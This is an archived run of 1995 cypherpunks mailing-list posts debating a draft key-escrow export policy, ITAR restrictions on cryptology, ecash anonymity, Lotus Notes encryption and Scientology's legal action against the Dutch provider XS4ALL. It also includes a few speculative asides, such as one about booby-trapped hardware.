#3: This rules out the possibility of escrowing individual session keys to
    limit the access of LE to sessions they are entitled by law to intercept.

#5: Care to tell us how to create software that can't be patched?
    This is one that's been played in the marketplace and has lost.  The
    battle between copy protectors and crackers has been decided in favor
    of the crackers: legitimate users largely refuse to buy packages that
    are too messy to deal with (e.g. they leave hidden files all over the
    disk, which may interfere with backups or other programs) or that use
    special purpose hardware (e.g. dongles that eat up a printer port).

    This one's a loser, I think.

#6: This is clearly a research issue.  Several speakers (even pro-GAK) at
    Crypto '95 said the policy decisions are being made before the
    research has been done.  The protocols and system specifications are
    key here, and it's not obvious how this criterion can be met.  It's
    not obviously impossible, but it certainly hasn't been solved in Clipper.

#7: One of the Crypto '95 attacks on the Clipper protocol makes use of
    this misfeature of Clipper.  It allows a broadening of the net of
    captured keys so that many more unauthorized messages may be read.

#8: See #3 above -- let's wait on the policy decision until we have a policy
    debate.  A mandated compromise is an oxymoron.  I (for one) would prefer
    to see much more limited keys (like session keys) if Congress decides
    that the right to privacy is not infringed by these technologies.

There's nothing in here that specifically excludes dividing your keys
among multiple escrow agents; I assume this is still an open issue still,
or that it goes without saying (one way or the other).

#3 and #6 make it impossible to prevent LE from reading messages from
before or after their legally authorized window.  This is clearly broken.

Again, this appears to be trying to put all the power in the hands of LE to
the detriment of the people.  It's advertized as a compromise, but I see
nothing gained over Clipper I.  The only differences appear to be that the
escrow agent(s) may be private instead of government, and the algorithms may
be something other than SKIPJACK as long as they are at least 16 bits
weaker as well as being known algorithms.

It also doesn't address the main problem with Clipper I: that it wouldn't
work, since (like Clipper I) it will catch only crooks who are smart enough
to encrypt but stupid enough to encrypt with a system they (should) know LE
can read -- probably a null set.  If, on the other hand, this is made
mandatory for encrypted transmissions, it will create a new and unnecessary
class of criminals, probably including myself (though I won't promise to
break any laws at this point).

This really burns me up.  What do they think they're doing here?  Am I
missing a big piece of it?

	Jim Gillogly
	Hevensday, 14 Halimath S.R. 1995, 22:02




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Tunnicliffe" <tunny@Inference.COM>
Date: Tue, 5 Sep 95 15:13:33 PDT
To: Peter Trei <trei@process.com>
Subject: RE: VCRPLUS Huffman code
Message-ID: <304CCA55@smtp-pc>
MIME-Version: 1.0
Content-Type: text/plain



>On Tue, 5 Sep 1995, Peter Trei wrote:
>
>>
>> > Has anyone worked out the VCRPLUS code?
>>
>
>  <chomp>
>
>> Code which implemented this partial crack was published on the net,
>> and the VCR+ people got very upset about it - apparently they make
>
>  I believe the code is in the cookbook archive at ftp.ee.ualberta.ca,
>but when I just tried to confirm I got timeouts.
>
>   Brian

Among many other places, you can get this off my Web page, in:
 http://www.inference.com/~tunny/crypto/primer.html

 - Tunny
______________________________________________________________________
James A. Tunnicliffe   | WWWeb: http://www.inference.com/~tunny
Inference Corporation  | PGP Fingerprint:   CA 23 E2 F3 AC 2D 0C 77
tunny@Inference.com    | <--finger for key  36 07 D9 33 3D 32 53 9C
======================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Goldberg <iagoldbe@csclub.uwaterloo.ca>
Date: Tue, 5 Sep 95 12:46:19 PDT
To: cypherpunks@toad.com
Subject: Re: Wearing RSA shirt to school
Message-ID: <199509051946.PAA03230@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


OK, I'm confused.  Is it or is it not legal to disclose cryptology to
a foreigner?  T.C.May (I think it was; sorry if I misremember this) posted
a couple of days ago that it _was_ legal (citing that textbooks are not
stopped from being published internationally).

Perhaps this is just because the publishers of these texts never applied
for an export license (maybe)?  I was reading Bernstein vs. US Dept. of
State, et al. (http://pgp.ai.mit.edu/~bal/legal/complaint-950221.html),
and found this:


G.  RESULT OF DEFENDANTS' REJECTION OF PLAINTIFF'S CJ REQUEST
    71.  Plaintiff's scientific paper, algorithm and computer program are
speech protected by the First Amendment to the United States Constitution.
Thus, by rejecting Plaintiff's CJ Request, Defendants have determined that
these items are "defense articles or defense services" which may not be
exported without submitting to the above-described prior restraints.  Since
Defendants define "export" to include disclosing or transferring cryptology
to a foreign person anywhere in the world, including within the United
States, Plaintiff is informed and believes and therefore alleges that he is
required by law to obtain a license to publish or publicly discuss any of
the Items whether within or outside the United States.
    72.  Plaintiff is presently unable to publish his scientific paper,
algorithm or computer program within or outside the United States.  The
only reason preventing publication is the threat of prosecution for an
illegal export if he does so without a license.
    73.  To this date, Plaintiff has not received a response to his
appeal or a license to publish his paper, algorithm, or computer program
and as a result, he has not published the Items.


So it seems to me (at least according to the Plaintiff (EFF, I guess)),
that the ITAR regulations _do_ restrict publication and public discussion
of cryptology.

   - Ian "and why is Canada considered part of the US for this?"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Simmons <jsimmons@goblin.punk.net>
Date: Tue, 5 Sep 95 16:02:55 PDT
To: cypherpunks@toad.com
Subject: Re: NSA says Joe Sixpack won't buy crypto
In-Reply-To: <Pine.SUN.3.91.950904235841.8362A-100000@access2.digex.net>
Message-ID: <199509052300.QAA21504@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


> > 
> > Here's a prediction:  within one year, we will see the advent of Micro$oft's
> > "Not So Bad Privacy".  It'll be a secret algorithm with either GAK done by
> > Micro$oft itself, or a flat-out trap door.  ANY communications with a 
> > Windoze box or network will have to use it, or loose the market.
> 
Black Unicorn wrote:
> 
> It's here already.
> It's called "lotus notes."
> 
So what form of GAK or trap-door does lotus notes contain?

-- 
Jeff Simmons                           jsimmons@goblin.punk.net



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 5 Sep 95 16:11:53 PDT
To: cypherpunks@toad.com
Subject: Re: Forgery, bills, and the Four Horsemen  (Articles and Comment)
Message-ID: <199509052310.QAA10027@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: shamrock@netcom.com (Lucky Green)
> This is unnecessary, since there is no "true" ecash. DigiCash's ecash in
> its current form, the only version David Chaum is willing to licenese, is
> fully traceable. Popular Cypherpunk's myths nonwithstanding.
> 
> First, the recipient of funds is non-anonymous by design. Second, any payer
> can trivialy make the recipient of a ecash note known by revealing the
> blinding factor. For purposed of lawenforcement, DigiCash's ecash in no
> more secure than if the (insert horseman here) billed his fees to a credit
> card.

This is not completely correct; there is a degree of anonymity in
DigiCash's ecash.  That is anonymity of how a person spends his money.
Neither the bank nor the payor is in a position to learn who or where a
particular piece of ecash comes from (assuming that anonymous
communication means are used).

This is not trivial anonymity.  IMO the greatest privacy threat posed by
credit cards is exactly this, the tracking of spending information and
patterns.  With credit card payments a great deal of information can be
learned by the credit card company about what I do.  With ecash almost no
information is learned, only the raw amounts I spend.  And if I occasionally
make payments to myself even that is blurred.

Ecash is not all that we might hope it could be but it is more than a
myth that it allows untraceable transactions.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Tue, 5 Sep 95 14:21:26 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Emergency File Wipe Algorithim
Message-ID: <9509052120.AA02633@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green writes:
>  Didn't I just read a day ago that Robert Morris (ex-NSA) cautioned
>  that one should never underestimate the time and effort an opponent
>  is willing to put into recovering your data?
>
>  May I also point out that the rules of economics do not apply to
>  the federal government, since it insits - quite successfully - on
>  having a monoploy on using lethal force to extract arbitraily large
>  amounts from hundreds of millions of working Americans?

As always, Rubber Hose Cryptanalysis(*tm, patent pending) is usually the  
cheapest way to go...if you're a federal government.

But not all threats are that serious.  For instance, I have no fears that the  
admins here would grovel over the oxides on RAM cells in order to determine  
the pass-phrase of my PGP key if they suspected me of doing something naughty  
(even if they knew this was possible, which is unlikely).

You can get really paranoid about security and rightly so if your opponent is  
a federal government.  However, pushing key-material bits around RAM in order  
to prevent them from being burned into the chips is probably going to do you  
little good if, for instance, a hardware keystroke monitor is surreptitiously  
installed in your keyboard (which is likely far cheaper and easier than  
analysing RAM chips and maybe even disk platters).

BTW, this is not a troll and I know that the possible constitutionality of  
court-ordered disclosure of passphrases or key-material has been hashed over  
many times in the past here, but have any cases with this particular  
attribute gone through court yet?  There were reports even years ago of  
pedophiles and other agents of the Four Horsemen using PGP to encrypt diaries  
and such, have any of these cases gone to court yet and did the prosecution  
attempt to force the defendant to reveal a passphrase??


andrew
(wonders how many readers will take their keyboards apart to look for radio  
transmitters)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Tue, 5 Sep 95 14:37:28 PDT
To: Jim Gillogly <jim@rand.org>
Subject: Another Son of Clipper discussion paper
In-Reply-To: <199509052053.NAA01226@mycroft.rand.org>
Message-ID: <9509052136.AA11617@alpha>
MIME-Version: 1.0
Content-Type: text/plain



This is really interesting to me:

Jim Gillogly forwards:
 > Key Escrow Issues Meeting, September 6-7, 1995
 > Discussion Paper #3
 > 
 >                  Export Criteria Discussion Draft --
 >                 64-bit Software Key Escrow Encryption
 > . . .
 >                           --- Draft Export Criteria ---
 > for Software Key Escrow Encryption
 > 
 > Software key escrow encryption products meeting the following
 > criteria will be granted special export licensing...
 > 
 > 1.    The product will use an unclassified encryption algorithm
 >       (e.g., DES, RC4) with a key length not to exceed 64 bits.

Ok, sounds good... but what I don't understand is further on:

 > 5.    The product shall be resistant to any alteration that would
 >       disable or circumvent the key escrow mechanism, to include
 >       being designed so that the key escrow mechanism cannot be
 >       disabled by a static patch, (i.e., the replacement of a
 >       block of code by a modified block).

[ that I can understand ]

 > 6.    The product shall not decrypt messages or files encrypted by
 >       non-escrowed products, including products whose key escrow
 >       mechanisms have been altered or disabled.

This is where I start scratching my head.  I mean, how exactly will
the software be able to tell that what's being fed into it came from a
Good version versus an Evil version of the cryptosystem?  Isn't that
very issue the reason for Skipjack being (A) secret and (B) kept on a
supposedly auto-desctruct chip?

If the algorithm is public (and to stretch a point, if the executable
makes it onto somebody's hard disk, it's effectively public), I don't
really understand how the above can be made a realistic goal.  I'd
always thought that the idea behind software key escrow was that it'd
be stuck into most "name-brand" tools, so that Joe Lazy AOL User
wouldn't bother (or wouldn't know how) to circumvent it.  (Still seems
kinda ridiculous, but maybe that's just me.)  Anyway, this document
makes it seem like somebody seriously expects this is doable.  If it
is, then I *really* want to know how (because I'd like to exploit that
sort of technology myself...).

 > 7.    The key escrow mechanism allows access to a user's encrypted
 >       information regardless of whether that user is the sender or
 >       the intended recipient of the encrypted information.

Ooh.

 > 8.    The key escrow mechanism shall not require repeated
 >       involvement by the escrow agents for the recovery of
 >       multiple decryption keys during the period of authorized
 >       access.

Hmm...

 > 9.    In the event any such product is or may be available in the
 >       United States, each production copy of the software shall
 >       either have a unique key required for decrypting messages or
 >       files that is escrowed in accordance with #10, 

Well there go the manufacturing costs up through the roof...

 >       or have the
 >       capability for its escrow mechanism to be rekeyed and any
 >       new key to be escrowed in accordance with #10.

I guess that'd work with the somewhat weak mechanisms used with
"unlockable" CD-ROM stuff.

 > 10.   The product shall accept escrow of its key(s) only with
 >       escrow agents certified by the U.S. Government or by foreign
 >       governments with which the U.S. Government has formal
 >       agreements consistent with U.S. law enforcement and national
 >       security requirements.

Again, how can it tell?

Maybe I'm just being dense.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Tue, 5 Sep 95 14:11:36 PDT
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Forgery, bills, and the Four Horsemen (Articles and Comment)
In-Reply-To: <v02120d03ac7260cb02e3@[192.0.2.1]>
Message-ID: <Pine.SUN.3.91.950905165830.3229A-100000@access2.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 5 Sep 1995, Lucky Green wrote:

> Date: Tue, 5 Sep 1995 12:45:44 -0800
> From: Lucky Green <shamrock@netcom.com>
> To: Black Unicorn <unicorn@access.digex.net>, cypherpunks@toad.com
> Subject: Re: Forgery, bills, and the Four Horsemen (Articles and Comment)
> 
> At 23:44 9/4/95, Black Unicorn wrote:
> [...]
> 
> >3.  The corruption of e-cash to further the above.
> >
> >If the government is disturbed by the laundering of money enough
> >to actually print, or even propose printing, two kinds of
> >currency, how will they respond to untraceable, unaccountable and
> >infinitely liquid e-cash?  I think the answer is in past behavior:
> >e-cash will be linked to the four horsemen and subjected to
> >rigorous reporting requirements- systems which are true e-cash
> >will be banned.
> 
> This is unnecessary, since there is no "true" ecash. DigiCash's ecash in
> its current form, the only version David Chaum is willing to licenese, is
> fully traceable. Popular Cypherpunk's myths nonwithstanding.

Perhaps true, but this assumes that the Chaum method is the only method, 
which I believe to be incorrect.  Perhaps I should use the term "future 
e-cash models" or "True Digital Cash."

Currently there is no "true" e-cash implemented (as far as I know), but 
this is part of the problem.

The product introduced to the public, the original market release
will be (is) traceable, why should the public expect anything different?  In
addition this is exactly what I was talking about in deterring the use of
"real" e-cash.  Real e-cash will be seen as an anomoly, a perversion of e-cash 
to make it sneaky for the four horsemen (or that's how I would play it to 
the public were I a statist).

> 
> First, the recipient of funds is non-anonymous by design. Second, any payer
> can trivialy make the recipient of a ecash note known by revealing the
> blinding factor. For purposed of lawenforcement, DigiCash's ecash in no
> more secure than if the (insert horseman here) billed his fees to a credit
> card.
> 

Again, one more reason that "real" e-cash will be banned.  The public 
doesn't need it as an alternative is widely available.

This is the curse (or gift) of crippleware- its use as a diversion.
See also, Clipper

> -- Lucky Green <mailto:shamrock@netcom.com>
>    PGP encrypted mail preferred.

---
00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Sam Kaplin" <skaplin@mirage.skypoint.com>
Date: Tue, 5 Sep 95 16:04:54 PDT
To: cypherpunks@toad.com
Subject: Police and scientology visit XS4ALL Amsterdam
Message-ID: <m0sq71T-00056WC@skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain



From: XS4ALL Internet
      Postbus 22864
      1100 DJ  Amsterdam
      tel: +31 20 6222885
      fax: +31 20 6222753



        PRESS RELEASE
        -------------


    Police and members of Scientology church enter offices of XS4ALL
    ================================================================

Amsterdam - thuesday september 5, 1995.

Today at about 14:00, XS4ALL was visited by Mr. S. Braan,
bailiff. He was acting on behalf of the Religious
Technology Centre, better known as the Scientology Church, or
Scientology for short. He was assisted by a local police officer and Mr.
Hermans from the 'Nauta-Dutilh' legal firm that represents Scientology
in The Netherlands. Also present were two computer experts (Mr. Ootjes
and Mr. Van Suchtelen) a locksmith (to enter had we not been present) and
two American employees of Scientology, Mr. Weightman and Ms. Jenssen.

Scientology is filing for seizure of XS4ALL's computer equipment. Under
dutch law, this means that a bailiff comes in to record your assets. In
real-life, the computer-experts that were present have recorded the
types and serial numbers of all the computers in our offices. They did
not take any equipment, the continuity of XS4ALL's services is not in
jeopardy.


What is this all about?
-----------------------

The Scientology Church claims that the XS4ALL anonymous remailer was used
to disseminate documents over the Internet to which the church holds the
legal copyright. This has led the church to ask the president of the
district court of Amsterdam to grant permission for this seizure as a
prelude to legal procedures concerning damages suffered by the church.
The remailer in question has been disabled more than 2 months ago.

During the visit of Scientology to XS4ALL this afternoon, the remailer
was not the subject of any conversation. The organisation seemed totally
preoccupied with the information about Scientology that one of our users
has put on his home page. Part of this information is said to be a file
to which Scientology holds the copyright. If we were to delete the file
in question on the spot, they were willing to drop the seizure.


Responsability of Internet Providers
------------------------------------

XS4ALL categorically denies any responsability for contents of users'
homepages. The users decide for themselves what is on their homepage.
Since XS4ALL does not edit the homepages and has no mechanism of
control over the contents we strongly feel that the users themselves are
responsible for what they say on their homepage.

This whole affair demonstrates the need for clarity concerning the legal
postion of Internet Providers. We are shocked that our offices can be
invaded bij freshly flown-in U.S. cult members. If we as Internet
providers are held responsible for what our users say, that will
undoubtebly kill freedom of speech on the net.


Scare-tactics
-------------

XS4ALL is not alone in receiving this kind of attention from
Scientology. Scientology, a semi-religious multinational, is at war with
a number of people on the Internet. A non-organized group of people on
the net has started to openly discuss the activities of the church.
Until recently, the church has always managed to supress critical voices
by means of sheer intimidation and by engaging in endless legal battle.

One of the people that Scientology has a problem with is 'fonss', an
XS4ALL user that publishes the F.A.C.T.-net Kit on his home page
(http://www.xs4all.nl/~fonss). This kit (which can be found on numerous
homepages all over the Internet) consists of a large number of documents
that show the true face of Scientology.

One of these documents is a piece to which Scientology supposedly holds
the copyright and which has been added to the kit without the church's
permission.



Additional information can be found on the Internet:

http://www.cybercom.net/~rnewman/scientology/home.html
http://www.xs4all.nl/~fonss
news:alt.religion.scientology
news:alt.censorship
news:alt.clearing.technology




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@iglou.com (Steven Weller)
Date: Tue, 5 Sep 95 18:16:49 PDT
To: Mats Bergstrom <asgaard@sos.sll.se>
Subject: Re: Forgery, bills, and the Four Horsemen (Articles and Comment)
Message-ID: <v01530503ac72b3cf500f@[199.171.88.78]>
MIME-Version: 1.0
Content-Type: text/plain


>   Black Unicorn posted a very interesting info summary on the
>   subject of foreign state US$$ forgery.
>
>This is a story I heard, long ago, from a Brit, Mr Waterlow,
>about something that happened to his grandfather, chairman
>of the Waterlow bank:
>
>Early in this century Portugal didn't print it's own money but
>contracted this job to the Waterlow Bank in England. Some
>skilled conmen succeeded in making the bank beleive they were
>representatives of the Portugeese National Bank. Then they
>ordered a huge amount of new bills and got away (at least
>for some time) with it.

Tis all in a book: "The Man Who Stole Portugal". I picked it up for about
$2 in a bookstore a few months ago. Very much worth a read. An incredibly
audacious escapade.


-------------------------------------------------------------------------
Steven Weller                      |  "The Internet, of course, is more
                                   |  than just a place to find pictures
Windsor Consulting Group           |  of people having sex with dogs."
stevenw@iglou.com                  |       -- Time Magazine, 3 July 1995






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 5 Sep 95 15:23:36 PDT
To: cypherpunks@toad.com
Subject: Re: SSLRef (SSLtelnet)
In-Reply-To: <199509051940.VAA26244@utopia.hacktic.nl>
Message-ID: <9509052222.AA31819@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>Is it possible that since this was only a "test" CA, that netscape used
>less than a full-strength key?  If it was only 512 bits or so, we could
>try cracking it.

Netscapes test cert is for a 1024 bit key


	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Tue, 5 Sep 95 09:33:35 PDT
To: cypherpunks@toad.com
Subject: Re: Forgery, bills, and the Four Horsemen (Articles and Comment)
In-Reply-To: <Pine.SUN.3.91.950905035559.13512A-100000@access2.digex.net>
Message-ID: <Pine.HPP.3.91.950905181951.7412A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


   Black Unicorn posted a very interesting info summary on the
   subject of foreign state US$$ forgery.

This is a story I heard, long ago, from a Brit, Mr Waterlow,
about something that happened to his grandfather, chairman
of the Waterlow bank:

Early in this century Portugal didn't print it's own money but
contracted this job to the Waterlow Bank in England. Some
skilled conmen succeeded in making the bank beleive they were
representatives of the Portugeese National Bank. Then they
ordered a huge amount of new bills and got away (at least
for some time) with it.
 
Now, the point is that this was acually GOOD for the Portugeese
ecomomy, the real National Bankers having underestimated the
optimal size of their cash stock.
 
So, I wonder, perhaps the world economy might benefit from
some Iranian addings to the number of $$ araound?
A Keynesian boost?
 
Just drifting (I know very little about economy...).
 
Mats




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 5 Sep 95 18:58:05 PDT
To: jim@rand.org>
Subject: Re: Another Son of Clipper discussion paper
Message-ID: <v02120d08ac72acec4bb0@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 16:36 9/5/95, Mike McNally wrote:
>If the algorithm is public (and to stretch a point, if the executable
>makes it onto somebody's hard disk, it's effectively public), I don't
>really understand how the above can be made a realistic goal.

Windows 95 is on a lot of people's hard drives. It is therefore public and
available for every one's inspection.  How many people do you know that
have reverse engineered Windows 95. How many of those use a reverse
engineered version. I'd venture it is zero out of zero.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 5 Sep 95 18:57:30 PDT
To: announce <cypherpunks@toad.com
Subject: Re: Scientology and police visit XS4ALL Amsterdam
Message-ID: <v02120d09ac72ae60a310@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 23:09 9/5/95, announce wrote:
[...]
>    Police and members of Scientology church enter offices of XS4ALL
>    ================================================================

I am wondering about the legalities of booby trapped computer equipment.
Would it be legal if a clear warning to the fact was posted on the
hardware?

Interesting side note: a few months ago, several hundred 5 gallon
containers of insecticide were stolen from the lot of an agricultural
supply dealer here in California.  The incident made a small note in the SF
Chronicle. It was mentioned that the FBI is taking part in the
investigation.

What wasn't mentioned was that this insecticide is an ideal precursor to
various forms of neuro toxins, namely Tabun and Soman, two types of nerve
gas so vicious and toxic that even Hitler refused to approve their use. I
predict that eventful times are just around the corner.




-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 5 Sep 95 18:57:33 PDT
To: Sameer R Manek <seawolf@challenger.atc.fhda.edu>
Subject: Re: Emergency File Wipe Algorithim
Message-ID: <v02120d0aac72b1f47a51@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 15:47 9/5/95, Sameer R Manek wrote:
>> May I also point out that the rules of economics do not apply to the
>> federal government, since it insitsts - quite successfully - on having a
>> monopoly on using lethal force to extract arbitrarily large amounts from
>> hundreds of millions of working Americans?
>
>How do you figure the above? You only get to go to jail if you don't
>pay taxes...then you can't pick up the soap.

If aren't willing to pay your taxes, which by the way are nothing but
forced labor for a large part of the year, it is unlikely that you are
willing to spend the same or more forced time maufactoring license plates.
If your resist that kidnapping and introduction into a slave labor camp
that follows a "conviction" for not paying your taxes you will be forced to
comply. If you then resist that force you will be killed.

Chisel it in granite: the ultimate threat by which any government compels
compliance is _always_ lethal force.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Tue, 5 Sep 95 16:13:55 PDT
To: Jeff Simmons <jsimmons@goblin.punk.net>
Subject: Re: NSA says Joe Sixpack won't buy crypto
In-Reply-To: <199509052300.QAA21504@goblin.punk.net>
Message-ID: <Pine.SUN.3.91.950905191242.18066A-100000@access2.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 5 Sep 1995, Jeff Simmons wrote:

> Date: Tue, 5 Sep 1995 16:00:38 -0700 (PDT)
> From: Jeff Simmons <jsimmons@goblin.punk.net>
> To: cypherpunks@toad.com
> Subject: Re: NSA says Joe Sixpack won't buy crypto
> 
> > > 
> > > Here's a prediction:  within one year, we will see the advent of Micro$oft's
> > > "Not So Bad Privacy".  It'll be a secret algorithm with either GAK done by
> > > Micro$oft itself, or a flat-out trap door.  ANY communications with a 
> > > Windoze box or network will have to use it, or loose the market.
> > 
> Black Unicorn wrote:
> > 
> > It's here already.
> > It's called "lotus notes."
> > 
> So what form of GAK or trap-door does lotus notes contain?

No, it's just been so weak before the current implementation of RC4 (and 
note the export version still has 40 bits) that it might as well be nothing.

> 
> -- 
> Jeff Simmons                           jsimmons@goblin.punk.net
> 

00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Date: Tue, 5 Sep 95 18:32:19 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Forgery, bills, and the Four Horsemen (Articles and Comment)
In-Reply-To: <v02120d03ac7260cb02e3@[192.0.2.1]>
Message-ID: <199509060132.TAA04511@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Lucky Green <shamrock@netcom.com> wrote:
> 
> This is unnecessary, since there is no "true" ecash. DigiCash's ecash in
> its current form, the only version David Chaum is willing to licenese, is
> fully traceable. Popular Cypherpunk's myths nonwithstanding.
> 
> First, the recipient of funds is non-anonymous by design. Second, any payer
> can trivialy make the recipient of a ecash note known by revealing the
> blinding factor. For purposed of lawenforcement, DigiCash's ecash in no
> more secure than if the (insert horseman here) billed his fees to a credit
> card.


I'm sorry-- what do you mean by "the recipient of funds is non-anonymous"?  
I cannot envision any centralized currency system in which a user's funds
were *not* known to the bank!


Secondly, there is a tremendous difference between a person being able to
identify you as the recipient of their money (which they can pretty much do
anyway, with less surety, just by saying "That's him!  He's the one I gave
it to!") and a third party such as the bank or a government being able to
monitor all your transactions.  For such an organization to perform that feat
on a DigiCash user they would need the cooperation of all of the people with
whom he exchanges currency, and if they have that, then cryptography seems
irrelevant.  :-)


I hope I'm not missing anything here.


Regards,

Bryce

signatures follow:


                                 +                                           
    public key on keyservers     /.       island Life in a chaos sea         
    or via finger 0x617c6db9     /             bryce.wilcox@colorado.edu     
                                 ---*                                     

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3

iQCVAwUBMEz5/vWZSllhfG25AQEVsAQAo27grJhSgGV6iO2vIMILiBiib33/Z/73
Fzj5jgGVgqnlJ73UjHrInSas0p7wdKUf+PeLEtSc4xkMnOPvr3gsT34YAOvO6rcR
DsKwE7mnxK6hmxZl2UkUJ/dhZql5wbT2im27/RC+N2wgaGbahedpJfdjj+QPP06h
uEPTjvT7Yco=
=hDCy
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Tue, 5 Sep 95 17:27:53 PDT
To: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Subject: Re: Emergency File Wipe Algorithim
In-Reply-To: <9509052120.AA02633@ch1d157nwk>
Message-ID: <Pine.PMDF.3.91.950905202639.539014490I-100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 5 Sep 1995, Andrew Loewenstern wrote:

[...]> 
> BTW, this is not a troll and I know that the possible constitutionality of  
> court-ordered disclosure of passphrases or key-material has been hashed over  
> many times in the past here, but have any cases with this particular  
> attribute gone through court yet?  There were reports even years ago of  

AFAIK no reported cases.


A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
See (experimentally & erratically) http://viper.law.miami.edu/~mfroomki





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 5 Sep 95 20:17:51 PDT
To: cypherpunks@toad.com
Subject: Lotus Notes vs. the Web and the Net
Message-ID: <ac725ff00c021004df4c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:23 AM 9/6/95, Pat Farrell wrote:

>Of course, Corporate america loves Notes, which is why IBM bought it.
>
>Weak encryption for weak minds.

It may also signal that Lotus Notes has peaked, as IBM has a knack for
"buying at the top."

Interestingly, the current issue of "Wired" (morphed Aryanized OJ) says
that Lotus Notes is tired, and Web-based groupware is wired.

On this one I agree...and I've said this here on this list. Local groups,
such as university departments, corporate departments, even entire
corporations, can use the Web/Net in ways similar to what Lotus Notes
provides (using their own LANs, or even the Internet, with suitable
security steps).


Granted, Lotus Notes currently has more stuff oriented towards groupware
(from what I've been reading for several years, as I'm not a user), but I'd
expect a huge amount of work on Netscape and similar browsers, and other
Net systems,  will make the Web/Net a more common groupware platform.

I don't know this is so, but this is where I'd bet money. No way would I
pay $3 billion for Lotus Notes!

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Tue, 5 Sep 95 13:45:08 PDT
To: cypherpunks@toad.com
Subject: Re: Non-US SSL128 site
In-Reply-To: <199509051449.KAA13448@joplin.bwh.harvard.edu>
Message-ID: <42icqu$gst@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


